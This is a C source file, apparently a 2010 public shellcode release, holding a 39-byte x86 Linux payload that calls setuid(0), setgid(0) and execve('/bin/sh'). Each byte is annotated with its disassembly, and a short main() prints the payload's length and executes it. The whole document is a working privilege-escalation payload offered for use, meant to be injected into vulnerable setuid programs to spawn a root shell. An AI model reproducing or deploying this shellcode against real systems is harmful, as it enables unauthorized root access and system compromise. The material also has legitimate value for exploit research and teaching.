/* Name : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode Date : Tue Jun 1 21:29:10 2010 Author : gunslinger_ <yudha.gunslinger[at]gmail.com> Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian */ #include <stdio.h> char *shellcode= "\xeb\x19" /* jmp 0x804807b */ "\x31\xc0" /* xor %eax,%eax */ "\xb0\x17" /* mov $0x17,%al */ "\x31\xdb" /* xor %ebx,%ebx */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xor %eax,%eax */ "\xb0\x2e" /* mov $0x2e,%al */ "\x31\xdb" /* xor %ebx,%ebx */ "\xcd\x80" /* int $0x80 */ "\x31\xc0" /* xor %eax,%eax */ "\xb0\x0b" /* mov $0xb,%al */ "\x5b" /* pop %ebx */ "\x89\xd1" /* mov %edx,%ecx */ "\xcd\x80" /* int $0x80 */ "\xe8\xe2\xff\xff\xff" /* call 0x8048062 */ "\x2f" /* das */ "\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */ "\x2f" /* das */ "\x73\x68" /* jae 0x80480ef */ ""; int main(void) { fprintf(stdout,"Length: %d\n",strlen(shellcode)); ((void (*)(void)) shellcode)(); return 0; }